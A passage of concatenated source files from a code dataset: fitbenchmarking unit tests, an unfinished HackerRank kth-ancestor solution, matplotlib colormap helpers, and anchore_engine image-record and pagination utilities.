'{:04d}.png'.format(i))\n","sub_path":"python/example/render_starfish_3d.py","file_name":"render_starfish_3d.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"67489771","text":"\"\"\"\nTests for fitbenchmarking.core.fitting_benchmarking.loop_over_minimizers\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function)\nimport inspect\nimport os\nimport unittest\n\nfrom fitbenchmarking import mock_problems\nfrom fitbenchmarking.cost_func.nlls_cost_func import NLLSCostFunc\nfrom fitbenchmarking.utils import fitbm_result, output_grabber\nfrom fitbenchmarking.core.fitting_benchmarking import loop_over_minimizers\nfrom fitbenchmarking.parsing.parser_factory import parse_problem_file\nfrom fitbenchmarking.controllers.base_controller import Controller\nfrom fitbenchmarking.utils.options import Options\n\n# Defines the module which we mock out certain function calls for\nFITTING_DIR = \"fitbenchmarking.core.fitting_benchmarking\"\n\n\n# Due to construction of the controllers two folder functions\n# pylint: disable=unnecessary-pass\nclass DummyController(Controller):\n \"\"\"\n Minimal instantiatable subclass of Controller class for testing\n \"\"\"\n\n def __init__(self, cost_func):\n \"\"\"\n Initialize dummy controller\n\n :param cost_func: cost function class\n :type cost_func: CostFunc class\n \"\"\"\n super(DummyController, self).__init__(cost_func)\n self.algorithm_check = {'all': ['deriv_free_algorithm', 'general'],\n 'ls': [None],\n 'deriv_free': ['deriv_free_algorithm'],\n 'general': ['general']}\n self.final_params_expected = [[1, 2, 3, 4], [4, 3, 2, 1]]\n self.flag_expected = [0, 1]\n self.count = 0\n\n def setup(self):\n \"\"\"\n Mock controller setup function\n \"\"\"\n pass\n\n def fit(self):\n \"\"\"\n Mock controller fit function\n \"\"\"\n pass\n\n def jacobian_information(self):\n \"\"\"\n Mock controller jacobian_information function\n \"\"\"\n pass\n\n def cleanup(self):\n \"\"\"\n Mock controller cleanup function\n \"\"\"\n self.final_params = self.final_params_expected[self.count]\n self.flag = self.flag_expected[self.count]\n self.count += 1\n\n\ndef make_cost_function(file_name='cubic.dat', minimizers=None):\n \"\"\"\n Helper function that returns a simple fitting problem\n \"\"\"\n options = Options()\n if minimizers:\n options.minimizers = minimizers\n\n bench_prob_dir = os.path.dirname(inspect.getfile(mock_problems))\n fname = os.path.join(bench_prob_dir, file_name)\n\n fitting_problem = parse_problem_file(fname, options)\n fitting_problem.correct_data()\n cost_func = NLLSCostFunc(fitting_problem)\n return cost_func\n\n\nclass LoopOverMinimizersTests(unittest.TestCase):\n \"\"\"\n loop_over_minimizers tests\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setting up problem for tests\n \"\"\"\n self.minimizers = [\"deriv_free_algorithm\", \"general\"]\n self.cost_func = make_cost_function(minimizers=self.minimizers)\n self.problem = self.cost_func.problem\n self.controller = DummyController(cost_func=self.cost_func)\n self.options = self.problem.options\n self.grabbed_output = output_grabber.OutputGrabber(self.options)\n self.controller.parameter_set = 0\n self.count = 0\n self.result_args = {'options': self.options,\n 'cost_func': self.cost_func,\n 'jac': \"jac\",\n 'initial_params': self.problem.starting_values[0],\n 'params': [],\n 'chi_sq': 1}\n\n def mock_func_call(self, *args, **kwargs):\n \"\"\"\n Mock function to be used instead of loop_over_jacobians\n \"\"\"\n results = self.results[self.count]\n minimizer_list = self.minimizer_list[self.count]\n self.count += 1\n return results, self.chi_sq, minimizer_list\n\n def test_run_minimzers_none_selected(self):\n \"\"\"\n Tests that no minimizers are selected\n \"\"\"\n self.options.algorithm_type = \"ls\"\n results_problem, minimizer_failed, new_minimizer_list = \\\n loop_over_minimizers(self.controller, self.minimizers,\n self.options, self.grabbed_output)\n assert results_problem == []\n assert minimizer_failed == self.minimizers\n assert new_minimizer_list == []\n\n @unittest.mock.patch('{}.loop_over_jacobians'.format(FITTING_DIR))\n def test_run_minimzers_selected(self, loop_over_jacobians):\n \"\"\"\n Tests that some minimizers are selected\n \"\"\"\n self.options.algorithm_type = \"general\"\n self.results = [[self.result_args]]\n self.chi_sq = 1\n self.minimizer_list = [[\"general\"]]\n loop_over_jacobians.side_effect = self.mock_func_call\n\n results_problem, minimizer_failed, new_minimizer_list = \\\n loop_over_minimizers(self.controller, self.minimizers,\n self.options, self.grabbed_output)\n assert all(isinstance(x, fitbm_result.FittingResult)\n for x in results_problem)\n assert minimizer_failed == [\"deriv_free_algorithm\"]\n assert new_minimizer_list == [\"general\"]\n\n @unittest.mock.patch('{}.loop_over_jacobians'.format(FITTING_DIR))\n def test_run_minimzers_all(self, loop_over_jacobians):\n \"\"\"\n Tests that all minimizers are selected\n \"\"\"\n self.results = [[self.result_args], [self.result_args]]\n self.chi_sq = [1]\n self.minimizer_list = [[\"general\"], [\"deriv_free_algorithm\"]]\n loop_over_jacobians.side_effect = self.mock_func_call\n\n results_problem, minimizer_failed, new_minimizer_list = \\\n loop_over_minimizers(self.controller, self.minimizers,\n self.options, self.grabbed_output)\n assert all(isinstance(x, fitbm_result.FittingResult)\n for x in results_problem)\n assert minimizer_failed == []\n assert new_minimizer_list == [\"general\", \"deriv_free_algorithm\"]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"fitbenchmarking/core/tests/test_fitting_benchmarking_minimizers.py","file_name":"test_fitting_benchmarking_minimizers.py","file_ext":"py","file_size_in_byte":6105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"319049165","text":"import os\nimport math\n\n\ndef kAncestor(g, queries, root):\n n = len(g) - 1\n adj = {v: [] for v in range(n)}\n h, tree = [0] * n, [[0 for j in range(20)] for i in range(n + 1)]\n\n def dfs(u, p):\n for v in adj[u]:\n if v == p:\n continue\n h[v] = h[u] + 1\n for j in range(20):\n if j == 0:\n tree[v][j] = u\n else:\n if tree[v][j - 1] == 0:\n break\n else:\n tree[v][j] = tree[tree[v][j - 1]][j - 1]\n dfs(v, u)\n\n dfs(root, 0)\n ans = []\n for t, x, y in queries:\n pass\n return ans\n\n\nif __name__ == '__main__':\n t = int(input().strip())\n for _ in range(t):\n n = int(input().strip())\n g = {i: [] for i in range(1, n + 1)}\n root = None\n for _ in range(n):\n x, y = map(int, input().strip().split(\" \"))\n if y == 0:\n root = x\n else:\n g[x].append(y)\n g[y].append(x)\n Q = int(input().strip())\n queries = []\n for _ in queries:\n queries.append(map(int, input().strip().split(\" \")))\n res = kAncestor(g, queries)\n for x in res:\n print(x)\n","sub_path":"hackerank/2022/advance/kth-ancestor.py","file_name":"kth-ancestor.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"398065235","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom ._config import config\n\n\n__all__ = ['color_mapper', 'colors_from_cmap', 'cycle_cmap']\n\n\nCMAP_RANGE = config['color']['cmap_range']\n\n\ndef color_mapper(parameter_range, cmap=None, start=None, stop=None):\n \"\"\"Return color mapper, which returns color based on parameter value.\n\n Parameters\n ----------\n parameter_range : tuple of floats\n Minimum and maximum value of parameter.\n\n cmap : str or colormap\n A matplotlib colormap (see matplotlib.pyplot.cm) or the name of one.\n\n start, stop: 0 <= float <= 1\n Limit colormap to this range (start < stop 1). You should limit the\n range of colormaps with light values (assuming a white background).\n\n Returns\n -------\n map_color : function\n Function that returns an RGBA color from a parameter value.\n\n \"\"\"\n if cmap is None:\n cmap = config['color']['cmap']\n if isinstance(cmap, basestring):\n cmap = getattr(plt.cm, cmap)\n\n crange = list(CMAP_RANGE.get(cmap.name, (0, 1)))\n if start is None:\n start = crange[0]\n if stop is None:\n stop = crange[1]\n\n assert 0 <= start <= 1\n assert 0 <= stop <= 1\n\n pmin, pmax = parameter_range\n def map_color(val):\n \"\"\"Return color based on parameter value `val`.\"\"\"\n assert pmin <= val <= pmax\n val_norm = (val - pmin) * float(stop - start) / (pmax - pmin)\n idx = val_norm + start\n return cmap(idx)\n\n return map_color\n\n\ndef colors_from_cmap(length=50, cmap=None, start=None, stop=None):\n \"\"\"Return color cycle from a given colormap.\n\n Parameters\n ----------\n length : int\n The number of colors in the cycle. When `length` is large (> ~10), it\n is difficult to distinguish between successive lines because successive\n colors are very similar.\n\n cmap : str\n Name of a matplotlib colormap (see matplotlib.pyplot.cm).\n\n start, stop: 0 <= float <= 1\n Limit colormap to this range (start < stop 1). You should limit the\n range of colormaps with light values (assuming a white background).\n Some colors have default start/stop values (see `CMAP_RANGE`).\n\n Returns\n -------\n colors : list\n List of RGBA colors.\n\n See Also\n --------\n cycle_cmap\n\n \"\"\"\n if cmap is None:\n cmap = config['color']['cmap']\n if isinstance(cmap, basestring):\n cmap = getattr(plt.cm, cmap)\n\n crange = CMAP_RANGE.get(cmap.name, (0, 1))\n if start is not None:\n crange[0] = start\n if stop is not None:\n crange[1] = stop\n\n assert 0 <= crange[0] <= 1\n assert 0 <= crange[1] <= 1\n\n idx = np.linspace(crange[0], crange[1], num=length)\n return cmap(idx)\n\n\ndef cycle_cmap(length=50, cmap=None, start=None, stop=None, ax=None):\n \"\"\"Set default color cycle of matplotlib based on colormap.\n\n Note that the default color cycle is **not changed** if `ax` parameter\n is set; only the axes's color cycle will be changed.\n\n Parameters\n ----------\n length : int\n The number of colors in the cycle. When `length` is large (> ~10), it\n is difficult to distinguish between successive lines because successive\n colors are very similar.\n\n cmap : str\n Name of a matplotlib colormap (see matplotlib.pyplot.cm).\n\n start, stop: 0 <= float <= 1\n Limit colormap to this range (start < stop 1). You should limit the\n range of colormaps with light values (assuming a white background).\n Some colors have default start/stop values (see `CMAP_RANGE`).\n\n ax : matplotlib axes\n If ax is not None, then change the axes's color cycle instead of the\n default color cycle.\n\n See Also\n --------\n colors_from_cmap, color_mapper\n\n \"\"\"\n color_cycle = colors_from_cmap(length, cmap, start, stop)\n\n if ax is None:\n plt.rc('axes', color_cycle=color_cycle.tolist())\n else:\n ax.set_color_cycle(color_cycle)\n\n","sub_path":"mpltools/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"272846103","text":"import json\nimport re\nimport copy\nimport time\nimport base64\nimport hashlib\n\n# anchore modules\nimport anchore_engine.configuration.localconfig\nimport anchore_engine.utils\n\nfrom anchore_engine import db\nfrom anchore_engine.db import db_users\nfrom anchore_engine.subsys import logger\nfrom anchore_engine.clients.policy_engine.generated.models import ImageIngressRequest\nfrom anchore_engine.clients import docker_registry\nfrom anchore_engine.auth import anchore_resources\n\n\nsubscription_types = ['policy_eval', 'tag_update', 'vuln_update', 'repo_update', 'analysis_update']\nresource_types = ['registries', 'users', 'images', 'policies', 'evaluations', 'subscriptions', 'archive']\nbucket_types = [\"analysis_data\", \"policy_bundles\", \"policy_evaluations\", \"query_data\", \"vulnerability_scan\", \"image_content_data\", \"manifest_data\"]\nsuper_users = ['admin', 'anchore-system']\nimage_content_types = ['os', 'files', 'npm', 'gem', 'python', 'java']\nimage_metadata_types = ['manifest', 'docker_history', 'dockerfile']\nimage_vulnerability_types = ['os', 'non-os']\nos_package_types = ['rpm', 'dpkg', 'APKG']\nnonos_package_types = ['java', 'python', 'npm', 'gem', 'maven', 'js']\n\n\ndef do_simple_pagination(input_items, page=1, limit=None, dosort=True, sortfunc=lambda x: x, query_digest=\"\", ttl=0.0):\n page = int(page)\n next_page = None\n if not limit:\n return(1, None, input_items)\n\n limit = int(limit)\n if dosort:\n #input_items.sort()\n #input_items.sort(key=lambda x: x['image']['imageDigest'])\n input_items.sort(key=sortfunc)\n\n start = (page-1)*limit\n end = start + limit\n paginated_items = input_items[start:end]\n\n if len(paginated_items) == limit and (paginated_items[-1] != input_items[-1]):\n next_page = page + 1\n\n return(page, next_page, paginated_items)\n\npagination_cache = {}\ndef get_cached_pagination(query_digest=\"\"):\n current_time = time.time()\n\n if query_digest not in pagination_cache:\n raise Exception(\"document not in pagination cache.\")\n elif pagination_cache.get(query_digest, {}).get('ttl', 0.0) < current_time:\n logger.debug(\"expiring query cache content: {}\".format(query_digest))\n el = pagination_cache.pop(query_digest, None)\n del(el)\n raise Exception(\"document is expired in pagination cache.\")\n\n return(pagination_cache[query_digest]['content'])\n\ndef do_cached_pagination(input_items, page=None, limit=None, dosort=True, sortfunc=lambda x: x, query_digest=\"\", ttl=0.0):\n current_time = time.time()\n\n if ttl <= 0.0:\n logger.debug(\"skipping cache as ttl is <= 0.0 ({})\".format(ttl))\n elif query_digest not in pagination_cache:\n logger.debug(\"caching query content\")\n pagination_cache[query_digest] = {\n 'ttl': current_time + float(ttl),\n 'content': list(input_items),\n }\n return(do_simple_pagination(input_items, page=page, limit=limit, dosort=dosort, sortfunc=sortfunc, query_digest=query_digest, ttl=ttl))\n\ndef make_response_paginated_envelope(input_items, envelope_key='result', page=\"1\", limit=None, dosort=True, sortfunc=lambda x: x, pagination_func=do_simple_pagination, query_digest=\"\", ttl=0.0):\n page, next_page, paginated_items = pagination_func(input_items, page=page, limit=limit, dosort=dosort, sortfunc=sortfunc, query_digest=query_digest, ttl=ttl)\n return_object = {\n envelope_key: paginated_items,\n 'page': \"{}\".format(page),\n 'returned_count': len(paginated_items),\n 'total_count': len(input_items),\n }\n if next_page:\n return_object['next_page'] = \"{}\".format(next_page)\n\n return(return_object)\n\ndef update_image_record_with_analysis_data(image_record, image_data):\n\n image_summary_data = extract_analyzer_content(image_data, 'metadata')\n\n try:\n image_summary_metadata = copy.deepcopy(image_summary_data)\n if image_summary_metadata:\n logger.debug(\"getting image summary data\")\n\n summary_record = {}\n\n adm = image_summary_metadata['anchore_distro_meta']\n\n summary_record['distro'] = adm.pop('DISTRO', 'N/A')\n summary_record['distro_version'] = adm.pop('DISTROVERS', 'N/A')\n\n air = image_summary_metadata['anchore_image_report']\n airm = air.pop('meta', {})\n al = air.pop('layers', [])\n ddata = air.pop('docker_data', {})\n\n summary_record['layer_count'] = str(len(al))\n summary_record['dockerfile_mode'] = air.pop('dockerfile_mode', 'N/A') \n summary_record['arch'] = ddata.pop('Architecture', 'N/A') \n summary_record['image_size'] = str(int(airm.pop('sizebytes', 0))) \n\n formatted_image_summary_data = summary_record \n except Exception as err:\n formatted_image_summary_data = {}\n\n if formatted_image_summary_data:\n image_record.update(formatted_image_summary_data)\n \n dockerfile_content, dockerfile_mode = extract_dockerfile_content(image_data)\n if dockerfile_content and dockerfile_mode:\n image_record['dockerfile_mode'] = dockerfile_mode\n for image_detail in image_record['image_detail']:\n logger.debug(\"setting image_detail: \")\n image_detail['dockerfile'] = str(base64.b64encode(dockerfile_content.encode('utf-8')), 'utf-8')\n\n return(True)\n\nif False:\n def format_image_summary(image_summary_data):\n ret = {}\n\n # augment with image summary data, if available\n try:\n #if not input_image_summary_data:\n # try:\n # image_summary_data = catalog.get_document(user_auth, 'image_summary_data', image_record['imageDigest'])\n # except:\n # image_summary_data = {}\n #else:\n # image_summary_data = input_image_summary_data\n\n #if not image_summary_data:\n # # (re)generate image_content_data document\n # logger.debug(\"generating image summary data from analysis data\")\n # image_data = catalog.get_document(user_auth, 'analysis_data', image_record['imageDigest'])\n\n # image_content_data = {}\n # for content_type in anchore_engine.services.common.image_content_types:\n # try:\n # image_content_data[content_type] = anchore_engine.services.common.extract_analyzer_content(image_data, content_type)\n # except:\n # image_content_data[content_type] = {}\n # if image_content_data:\n # logger.debug(\"adding image content data to archive\")\n # rc = catalog.put_document(user_auth, 'image_content_data', image_record['imageDigest'], image_content_data)\n\n # image_summary_data = {}\n # try:\n # image_summary_data = anchore_engine.services.common.extract_analyzer_content(image_data, 'metadata')\n # except:\n # image_summary_data = {}\n\n # #if image_summary_data:\n # # logger.debug(\"adding image summary data to archive\")\n # # rc = catalog.put_document(user_auth, 'image_summary_data', image_record['imageDigest'], image_summary_data)\n\n image_summary_metadata = copy.deepcopy(image_summary_data)\n if image_summary_metadata:\n logger.debug(\"getting image summary data\")\n\n summary_record = {}\n\n adm = image_summary_metadata['anchore_distro_meta']\n\n summary_record['distro'] = adm.pop('DISTRO', 'N/A')\n summary_record['distro_version'] = adm.pop('DISTROVERS', 'N/A')\n\n air = image_summary_metadata['anchore_image_report']\n airm = air.pop('meta', {})\n al = air.pop('layers', [])\n ddata = air.pop('docker_data', {})\n\n summary_record['layer_count'] = str(len(al))\n summary_record['dockerfile_mode'] = air.pop('dockerfile_mode', 'N/A') \n summary_record['arch'] = ddata.pop('Architecture', 'N/A') \n summary_record['image_size'] = str(int(airm.pop('sizebytes', 0))) \n\n ret = summary_record\n\n except Exception as err:\n logger.warn(\"cannot format image summary data for image - exception: \" + str(err))\n\n return(ret)\n\n\ndef make_response_error(errmsg, in_httpcode=None, **kwargs):\n if not in_httpcode:\n httpcode = 500\n else:\n httpcode = in_httpcode\n detail = {}\n msg = str(errmsg)\n\n ret = {\n 'message': msg,\n 'httpcode': int(httpcode),\n 'detail': kwargs.get('detail', {})\n }\n\n if type(errmsg) == Exception:\n if 'anchore_error_json' in errmsg.__dict__:\n if set(['message', 'httpcode', 'detail']).issubset(set(errmsg.__dict__['anchore_error_json'])):\n ret.update(errmsg.__dict__['anchore_error_json'])\n \n return(ret)\n\ndef make_anchore_exception(err, input_message=None, input_httpcode=None, input_detail=None, override_existing=False):\n ret = Exception(err)\n\n if not input_message:\n message = str(err)\n else:\n message = input_message\n\n if input_detail != None:\n detail = input_detail\n else:\n detail = {'raw_exception_message': str(err)}\n\n if not input_httpcode:\n httpcode = 500\n else:\n httpcode = input_httpcode\n\n anchore_error_json = {}\n try:\n if type(err) == Exception:\n if 'anchore_error_json' in err.__dict__:\n anchore_error_json.update(err.__dict__['anchore_error_json'])\n except:\n pass\n\n if override_existing or not anchore_error_json:\n ret.anchore_error_json = {\n 'message': message,\n 'detail': detail,\n 'httpcode': httpcode,\n }\n else:\n ret.anchore_error_json = anchore_error_json\n\n return(ret)\n\ndef make_response_routes(apiversion, inroutes):\n return_object = {}\n httpcode = 500\n\n routes = []\n try:\n for route in inroutes:\n routes.append('/'.join([apiversion, route]))\n except Exception as err:\n httpcode = 500\n return_object = make_response_error(err, in_httpcode=httpcode)\n httpcode = return_object['httpcode']\n\n else:\n httpcode = 200\n return_object = routes\n\n return(return_object, httpcode)\n\ndef lookup_registry_image(userId, image_info, registry_creds):\n digest = None\n manifest = None\n\n if not anchore_resources.registry_access(userId, image_info['registry']):\n raise Exception(\"access denied for user (\"+str(userId)+\") registry (\"+str(image_info['registry'])+\")\")\n else:\n try:\n manifest,digest = docker_registry.get_image_manifest(userId, image_info, registry_creds)\n #if 'schemaVersion' not in manifest or manifest['schemaVersion'] != 2:\n # raise Exception(\"manifest schemaVersion != 2 not supported\")\n except Exception as err:\n raise anchore_engine.services.common.make_anchore_exception(err, input_message=\"cannot fetch image digest/manifest from registry\", input_httpcode=400)\n #raise Exception(\"cannot fetch image digest/manifest from registry - exception: \" + str(err))\n\n return(digest, manifest)\n\ndef get_image_info(userId, image_type, input_string, registry_lookup=False, registry_creds=[]):\n ret = {}\n if image_type == 'docker':\n try:\n image_info = anchore_engine.utils.parse_dockerimage_string(input_string)\n except Exception as err:\n raise anchore_engine.services.common.make_anchore_exception(err, input_message=\"cannot handle image input string\", input_httpcode=400)\n\n ret.update(image_info)\n\n if registry_lookup and image_info['registry'] != 'localbuild':\n digest, manifest = lookup_registry_image(userId, image_info, registry_creds)\n image_info['digest'] = digest\n image_info['fulldigest'] = image_info['registry']+\"/\"+image_info['repo']+\"@\"+digest\n image_info['manifest'] = manifest\n \n # if we got a manifest, and the image_info does not yet contain an imageId, try to get it from the manifest\n if manifest and not image_info['imageId']:\n try:\n imageId = re.sub(\"^sha256:\", \"\", manifest['config']['digest'])\n image_info['imageId'] = imageId\n except Exception as err:\n logger.debug(\"could not extract imageId from fetched manifest - exception: \" + str(err))\n logger.debug(\"using digest hash as imageId due to incomplete manifest (\"+str(image_info['fulldigest'])+\")\")\n htype, image_info['imageId'] = image_info['digest'].split(\":\", 1)\n\n ret.update(image_info)\n else:\n image_info['manifest'] = {}\n\n else:\n raise Exception (\"image type (\"+str(image_type)+\") not supported\")\n\n return(ret)\n\ndef policy_engine_image_load(client, imageUserId, imageId, imageDigest):\n\n resp = None\n\n try:\n request = ImageIngressRequest(user_id=imageUserId, image_id=imageId, fetch_url='catalog://'+str(imageUserId)+'/analysis_data/'+str(imageDigest))\n\n #request = ImageIngressRequest()\n #request.user_id = imageUserId\n #request.image_id = imageId\n #request.fetch_url='catalog://'+str(imageUserId)+'/analysis_data/'+str(imageDigest)\n\n logger.debug(\"policy engine request (image add): \" + str(request))\n resp = client.ingress_image(request)\n logger.spew(\"policy engine response (image add): \" + str(resp))\n except Exception as err:\n logger.error(\"failed to add/check image: \" + str(err))\n raise err\n\n return(resp)\n\ndef clean_docker_image_details_for_update(image_details):\n ret = []\n\n for image_detail in image_details:\n el = {}\n for k in list(image_detail.keys()):\n if image_detail[k] != None:\n el[k] = image_detail[k]\n ret.append(el)\n return(ret)\n\ndef make_image_record(userId, image_type, input_string, image_metadata={}, registry_lookup=True, registry_creds=[]):\n if image_type == 'docker':\n try:\n dockerfile = image_metadata['dockerfile']\n except:\n dockerfile = None\n\n try:\n dockerfile_mode = image_metadata['dockerfile_mode']\n except:\n dockerfile_mode = None\n\n try:\n tag = image_metadata['tag']\n except:\n tag = None\n\n try:\n imageId = image_metadata['imageId']\n except:\n imageId = None\n\n try:\n digest = image_metadata['digest']\n except:\n digest = None\n\n try:\n annotations = image_metadata['annotations']\n except:\n annotations = {}\n\n #try:\n # manifest = image_metadata['manifest']\n #except:\n # manifest = None\n\n return(make_docker_image(userId, input_string=input_string, tag=tag, digest=digest, imageId=imageId, dockerfile=dockerfile, dockerfile_mode=dockerfile_mode, registry_lookup=registry_lookup, registry_creds=registry_creds, annotations=annotations))\n\n else:\n raise Exception(\"image type (\"+str(image_type)+\") not supported\")\n\n return(None)\n\ndef make_docker_image(userId, input_string=None, tag=None, digest=None, imageId=None, dockerfile=None, dockerfile_mode=None, registry_lookup=True, registry_creds=[], annotations={}):\n ret = {}\n\n if input_string:\n image_info = get_image_info(userId, \"docker\", input_string, registry_lookup=registry_lookup, registry_creds=registry_creds)\n else:\n if digest:\n image_info = get_image_info(userId, \"docker\", digest, registry_lookup=registry_lookup, registry_creds=registry_creds)\n digest = image_info['digest']\n \n if tag:\n image_info = get_image_info(userId, \"docker\", tag, registry_lookup=registry_lookup, registry_creds=registry_creds)\n if digest and not image_info['digest']:\n image_info['digest'] = digest\n \n if 'digest' in image_info:\n imageDigest = str(image_info['digest'])\n else:\n raise Exception(\"input image_info needs to have a digest\")\n \n if imageId:\n image_info['imageId'] = imageId\n\n new_input = db.CatalogImage().make()\n new_input['imageDigest'] = imageDigest\n new_input['userId'] = userId\n new_input['image_type'] = 'docker'\n new_input['dockerfile_mode'] = dockerfile_mode\n\n final_annotation_data = {}\n for k,v in list(annotations.items()):\n if v != 'null':\n final_annotation_data[k] = v\n new_input['annotations'] = json.dumps(final_annotation_data)\n \n new_image_obj = db.CatalogImage(**new_input)\n new_image = dict((key,value) for key, value in vars(new_image_obj).items() if not key.startswith('_'))\n new_image['image_detail'] = []\n\n if image_info['tag']:\n new_input = db.CatalogImageDocker().make()\n new_input['imageDigest'] = imageDigest\n new_input['userId'] = userId\n new_input['dockerfile'] = dockerfile\n\n for t in ['registry', 'repo', 'tag', 'digest', 'imageId']:\n if t in image_info:\n new_input[t] = image_info[t]\n \n new_docker_image_obj = db.CatalogImageDocker(**new_input)\n new_docker_image = dict((key,value) for key, value in vars(new_docker_image_obj).items() if not key.startswith('_'))\n new_image['image_detail'] = [new_docker_image]\n\n ret = new_image\n return(ret)\n\ndef make_policy_record(userId, bundle, policy_source=\"local\", active=False):\n payload = {}\n\n policyId = bundle['id']\n\n payload[\"policyId\"] = policyId\n payload[\"active\"] = active\n payload[\"userId\"] = userId\n payload['policybundle'] = bundle\n payload['policy_source'] = policy_source\n\n return(payload)\n\ndef make_eval_record(userId, evalId, policyId, imageDigest, tag, final_action, eval_url):\n payload = {}\n\n payload[\"policyId\"] = policyId\n payload[\"userId\"] = userId\n payload[\"evalId\"] = evalId\n payload[\"imageDigest\"] = imageDigest\n payload[\"tag\"] = tag\n payload[\"final_action\"] = final_action\n payload[\"policyeval\"] = eval_url\n payload[\"created_at\"] = int(time.time())\n payload[\"last_updated\"] = payload['created_at']\n\n return(payload)\n\ndef do_request_prep(request, default_params={}):\n ret = {}\n try:\n try:\n ret['auth'] = (request.authorization.username, request.authorization.password)\n except:\n try:\n ret['auth'] = (request.authorization.username, None)\n except:\n ret['auth'] = (None, None)\n\n try:\n ret['userId'] = request.authorization.username\n except:\n ret['userId'] = None\n\n ret['method'] = request.method\n ret['bodycontent'] = str(request.get_data(), 'utf-8') if request.get_data() is not None else None\n ret['params'] = default_params\n for param in list(request.args.keys()):\n if type(request.args[param]) in [str, str]:\n if request.args[param].lower() == 'true':\n val = True\n elif request.args[param].lower() == 'false':\n val = False\n else:\n val = request.args[param]\n else:\n val = request.args[param]\n\n ret['params'][param] = val\n\n query_signature = copy.deepcopy(ret)\n query_signature['path'] = request.path\n query_signature.get('params', {}).pop('page', None)\n query_signature.get('params', {}).pop('limit', None)\n ret['pagination_query_digest'] = hashlib.sha256(json.dumps(query_signature, sort_keys=True).encode('utf8')).hexdigest()\n\n except Exception as err:\n logger.error(\"error processing request parameters - exception: \" + str(err))\n raise err\n\n return(ret)\n\ndef extract_dockerfile_content(image_data):\n dockerfile_content = \"\"\n dockerfile_mode = \"Guessed\"\n\n try:\n dockerfile_content = image_data[0]['image']['imagedata']['image_report']['dockerfile_contents']\n dockerfile_mode = image_data[0]['image']['imagedata']['image_report']['dockerfile_mode']\n except Exception as err:\n dockerfile_content = \"\"\n dockerfile_mode = \"Guessed\"\n\n return(dockerfile_content, dockerfile_mode)\n\ndef extract_analyzer_content(image_data, content_type, manifest=None):\n ret = {}\n try:\n idata = image_data[0]['image']\n imageId = idata['imageId']\n \n if content_type == 'files':\n try:\n fcsums = {}\n if 'files.sha256sums' in idata['imagedata']['analysis_report']['file_checksums']:\n adata = idata['imagedata']['analysis_report']['file_checksums']['files.sha256sums']['base']\n for k in list(adata.keys()):\n fcsums[k] = adata[k]\n\n if 'files.allinfo' in idata['imagedata']['analysis_report']['file_list']:\n adata = idata['imagedata']['analysis_report']['file_list']['files.allinfo']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n if k in fcsums:\n avalue['sha256'] = fcsums[k]\n ret[k] = avalue\n \n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'os':\n try:\n if 'pkgs.allinfo' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.allinfo']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'npm':\n try:\n if 'pkgs.npms' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.npms']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'gem':\n try:\n if 'pkgs.gems' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.gems']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'python':\n try:\n if 'pkgs.python' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.python']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'java':\n try:\n if 'pkgs.java' in idata['imagedata']['analysis_report']['package_list']:\n adata = idata['imagedata']['analysis_report']['package_list']['pkgs.java']['base']\n for k in list(adata.keys()):\n avalue = json.loads(adata[k])\n ret[k] = avalue\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'metadata':\n try:\n if 'image_report' in idata['imagedata'] and 'analyzer_meta' in idata['imagedata']['analysis_report']:\n ret = {'anchore_image_report': image_data[0]['image']['imagedata']['image_report'], 'anchore_distro_meta': image_data[0]['image']['imagedata']['analysis_report']['analyzer_meta']['analyzer_meta']['base']}\n except Exception as err:\n raise Exception(\"could not extract/parse content info - exception: \" + str(err))\n elif content_type == 'manifest':\n ret = {}\n try:\n if manifest:\n ret = json.loads(manifest)\n except:\n ret = {}\n elif content_type == 'docker_history':\n ret = []\n try:\n ret = idata.get('imagedata', {}).get('image_report', {}).get('docker_history', [])\n except:\n ret = []\n elif content_type == 'dockerfile':\n ret = \"\"\n try:\n if idata.get('imagedata', {}).get('image_report', {}).get('dockerfile_mode', \"\").lower() == 'actual':\n ret = idata.get('imagedata', {}).get('image_report', {}).get('dockerfile_contents', \"\")\n except:\n ret = \"\"\n\n except Exception as err:\n logger.warn(\"exception: \" + str(err))\n raise err\n\n return(ret)\n\n\ndef get_system_user_auth(session=None):\n localconfig = anchore_engine.configuration.localconfig.get_config()\n if 'system_user_auth' in localconfig and localconfig['system_user_auth'] != (None, None):\n return(localconfig['system_user_auth'])\n\n if session:\n system_user = db_users.get('anchore-system', session=session)\n if system_user:\n return( (system_user['userId'], system_user['password']) )\n\n return ( (None, None) 